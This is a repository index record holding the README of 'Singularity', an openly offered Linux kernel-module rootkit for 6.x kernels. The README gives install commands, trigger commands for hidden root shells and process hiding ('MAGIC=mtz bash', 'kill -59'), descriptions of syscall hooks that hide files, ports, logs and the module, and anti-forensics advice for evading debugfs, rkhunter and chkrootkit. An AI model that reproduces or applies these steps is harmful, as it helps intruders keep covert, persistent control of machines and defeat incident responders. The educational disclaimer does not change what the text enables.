{"id":31703685,"url":"https://github.com/matheuzsecurity/singularity","last_synced_at":"2025-10-08T22:25:21.376Z","repository":{"id":316267896,"uuid":"1062196393","full_name":"MatheuZSecurity/Singularity","owner":"MatheuZSecurity","description":"LKM rootkit for modern kernels (6x)","archived":false,"fork":false,"pushed_at":"2025-09-30T21:08:38.000Z","size":60,"stargazers_count":205,"open_issues_count":0,"forks_count":27,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-30T23:18:38.920Z","etag":null,"topics":["ftrace","hooking","kernel","linux","lkm","poc","rootkit","syscall"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MatheuZSecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-23T00:07:21.000Z","updated_at":"2025-09-30T22:56:16.000Z","dependencies_parsed_at":"2025-09-23T17:33:43.945Z","dependency_job_id":"51f39fc8-54a3-4d8a-9ef2-3d02405fc949","html_url":"https://github.com/MatheuZSecurity/Singularity","commit_stats":null,"previous_names":["matheuzsecurity/singularity"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/MatheuZSecurity/Singularity","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MatheuZSecurity","download_url":"https://codeload.github.com/MatheuZSecurity/Singularity/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279000780,"owners_count":26082851,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-08T02:00:06.501Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ftrace","hooking","kernel","linux","lkm","poc","rootkit","syscall"],"created_at":"2025-10-08T22:25:20.126Z","updated_at":"2025-10-08T22:25:21.371Z","avatar_url":"https://github.com/MatheuZSecurity.png","language":"C","readme":"# Singularity - A powerful Linux Kernel Rootkit\n\n\u003cimg src=\"https://i.imgur.com/MMYuntK.png\" alt=\"imgur\" width=\"600\"/\u003e\n\n\n\u003e *\"Shall we give forensics a little work?\"*  \n\n\n**Singularity** is a Linux Kernel Module (LKM) rootkit for modern kernels (6x).\n\n---\n\n## Install\n\nNOTE: There is no feature to make the module visible again, so once it is loaded, it will be hidden automatically and there is no way to remove it other than restarting the machine (if you have not enabled persistence after reboot).\n\n\n```\ncd /dev/shm\ngit clone https://github.com/MatheuZSecurity/Singularity\ncd Singularity\nmake\nsudo insmod singularity.ko\nsudo bash scripts/journal.sh\nsudo bash scripts/x.sh\ncd ..\n```\n\n## Usage features\n\n### Hiding process\n\nTo hide any process you can use `kill -59 PID`, and it will hide from `/proc/`, `ps`, `top`, and any process viewer, it will also be hidden from commands like `stat` and `ls`.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/wX2g459.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\n### Hiding directory / files\n\nTo hide any directory or file, you can edit or view the file at `include/hiding_directory_def.h` and create a directory or file with its name, for example using `singularity`.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/a8eb6KS.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\n### Become root\n\nTo become root, you can use the magic word, `MAGIC=mtz bash`, to spawn a bash with root.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/jCoi0LV.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\nAnd you can use `kill -59 PID` too for become root.\n\n### Hiding port\n\nYou can open a listening port 8081 and that port will be hidden for `ss`. `netstat`, `lsof` and `/proc/net/*` as well.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/WUuLu1q.png\"\u003e\n\u003c/p align=\"center\"\u003e\n\n\u003e **Tested kernels: (**6.8.0-79-generic** and **6.12** only), other kernel versions may not compile or crash, precisely because it was designed for modern 6x kernels. This is a risk you can take, so use it in a VM. You can also modify the code to work on any kernel version you like.**  \n\n## All credits\n\n**Singularity** was created by me (**MatheuZSecurity**) with the goal of challenging myself to create an LKM Rootkit that is as undetectable as possible\n\n- https://www.linkedin.com/in/mathsalves/\n\nJoin in **Rootkit Researchers** a community where there are only wizards and people who like rootkits, malware, red teaming, forensics and cyber security in general.\n\n- https://discord.gg/66N5ZQppU7\n\nThere are codes that I originally reused from my \"Collection of codes focused on Linux rootkits\" repository, so \n**credits to the repo contributors as well.**\n\n- https://github.com/MatheuZSecurity/Rootkit\n\n---\n\n\n## What Singularity *is*\n\nSingularity, at a high level:\n\n- Environment-triggered **privilege elevation** (signals/env markers).\n- **Process hiding**: syscall-level filtering of `/proc` and process APIs.\n- **Filesystem hiding**: directory listing and stat filtering by pattern.\n- **Network stealth**: procfs-based `/proc/net/*` filtering and selective packet suppression.\n- **Kernel log sanitization**: read-side filtering for `dmesg`/journal interfaces.\n- **Module-hiding utilities**: sysfs \u0026 module-list tampering for reduced visibility.\n- A background routine that **normalizes taint indicators** .\n\n\n## More evasion tips\n\n#### Debugfs\n\nAll current LKM rootkits, even open source ones, can be detected via `debugfs` on `/dev/sda3` (example) and this is certainly a problem for us.\n\n1) To prevent any operations performed from being easily detected by forensic tools such as `debugfs`, it is recommended to create hidden files and directories in `/dev/shm`.\n\nThis directory is a partition mounted in RAM `(tmpfs)`, meaning it does not use the disk file system. For this reason, debugfs, which works directly with file systems such as ext4, cannot inspect the contents of `/dev/shm`.\n\n2) Additionally, to ensure that files are actually destroyed on disk (if not in tmpfs), use the `shred` command.\n\nShred overwrites the data before deleting the file, minimizing the chance of recovery, including of inodes that may contain important metadata.\n\n3) If you want to enable persistence after reboot with `load_and_persistence.sh`, **know that the kernel module will also be visible in debugfs and can be found**, so it's up to each person whether they want to use it, if you don't want to use it, just simply use the `make` command and load the module with `sudo insmod singularity.ko`\n\n#### Standard tools\n\nSingularity is able to easily bypass standard tools like **unhide, chkrootkit and rkhunter.**\n\n#### Hidden file/directory\n\n1) You can simply change the name of the hidden pattern in `include/hiding_directory_def.h`, because if posts appear teaching how to detect it by this, you can change the name to whatever you want.\n\n2) You can also enable persistence after reboot, the name will be `singularity.conf`, but it is recommended that you change the name of the LKM/conf file, because if not a simple cat on the conf file in /etc/modules-load.d/ can reveal it to you\n\n3) By default, with the directory name hidden, you cannot access it via `cd` command, it is useful when you need to copy some important file into the directory and then `cat singularity/shadow`, or simply copy a binary or something you want into the directory, and from there you use it without necessarily entering the directory\n\n4) You can edit the filter in `modules/clear_taint_dmesg.c` as much as you want, you can add any log files you want or any file whose name you don't want to be visible (Be very careful with this, because depending on the word being filtered, it can break the system.)\n\n\n---\n\n## Hook map\n\nThis map shows the main hooks.\n\n```\n\n                            Rootkit Researchers\n                         +-----------------------+\n                         |   Userland Programs   |\n                         | (shells, tools, apps) |\n                         +-----------------------+\n                                    |\n                       Hooked syscalls \u0026 interfaces\n                                    |\n            +--------------------------------------------------+\n            |                  ftrace hook core               |\n            |   (centralized hook installer / fh_install)     |\n            +--------------------------------------------------+\n            /     |         |         |         |        |     \\\n           /      |         |         |         |        |      \\\n  +---------+ +-------+ +--------+ +--------+ +------+ +--------+ +------------+\n  | getdents | | stat/ | | open/  | | read/  | | tcp/ | | write/ | | module     |\n  | hooks    | | statx | | read-  | | read   | |proc/ | | hooks  | | hooks      |\n  | (hiding  | | hooks | | link   | | hooks  | |hooks | |(ftrace| |(insmod /   |\n  | _directory,| (_stat)| (_readlink)| (clear_) |(hiding)| control)| | hide_module)|\n  | _getdents)| |      | | hooks  | | taint) | |      | |        | |            |\n  +----+----+ +---+---+ +---+----+ +---+----+ +---+--+ +---+----+ +------+-----+\n       |          |         |          |        |        |             |\n       |          |         |          |        |        |             |\n       |          |         |          |        |        |             |\n  files/dirs   file meta   symlinks   kernel   /proc/net  debug/trace    module list\n  (ls, find)   (stat/statx) (readlink) logs \u0026  networking  interfaces    \u0026 sysfs\n                                              dmesg/journal\n                                            (taint masking, filtering)\n```\n\n---\n\n## Hook reference\n\n| Functions / Syscall | Module (file) | Short purpose |\n|---|---:|---|\n| `getdents` / `getdents64` | `modules/hiding_directory.c` | Filter directory entries by pattern \u0026 hide PIDs. |\n| `stat` / `statx` | `modules/hiding_stat.c` | Alter file metadata returned to userland; adjust `nlink`. |\n| `openat` / `readlinkat` | `modules/open.c`, `modules/hiding_readlink.c` | Return `ENOENT` for hidden paths / proc pids. |\n| `chdir` | `modules/hiding_chdir.c` | Block navigation into hidden paths. |\n| `read` (64/compat) | `modules/clear_taint_dmesg.c` | Filter kernel log reads (kmsg, journal) and remove tagged lines. |\n| `/proc/net` seqfile exports | `modules/hiding_tcp.c` | Filter TCP/UDP entries to hide a configured port; drop packets selectively. |\n| `write` syscalls | `modules/hooks_write.c` | Suppress writes to tracing controls like `ftrace_enabled`, `tracing_on`. |\n| `init_module` / `finit_module` | `modules/hooking_insmod.c` | Block native module insert attempts / syscall paths for insmod (optional). |\n| Module list / sysfs manipulation | `modules/hide_module.c` | Remove kobject entries and unlink module from list. |\n| Kernel taint mask (kprobe) | `modules/reset_tainted.c` | Locate tainted_mask and periodically normalize it . |\n| Credential manipulation | `modules/become_root.c` | Privilege escalation triggers. |\n| Hook installer | `ftrace/ftrace_helper.c` | Abstraction used to install ftrace-based hooks across modules. |\n\n\n---\n\n## Plot\n\nUnfortunately for some...\n\nEven with all these filters, protections, and hooks, there are still ways to detect this rootkit. \n\nBut if you're a good forensic, DFIR, or malware analyst, I'll let you figure it out on your own. \n\nI won't patch for this, because it will be much more OP ;)\n\n---\n## Contribution and Bugs\n\nFeel free to make pull requests and contribute to the project. Any errors with Singularity, please create an issue and report it to us.\n\nAny bug found, if you want, open a issue or contact me via discord: `kprobe`\n\n---\n\n## Disclaimer\n\nThis code was developed solely for educational purposes, research, and controlled demonstrations of evasion techniques. Any use outside authorized environments, or for malicious purposes, is strictly prohibited and entirely the responsibility of the user. Unauthorized or illegal use may violate local, national, or international laws.\n\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmatheuzsecurity%2Fsingularity","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmatheuzsecurity%2Fsingularity","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmatheuzsecurity%2Fsingularity/lists"}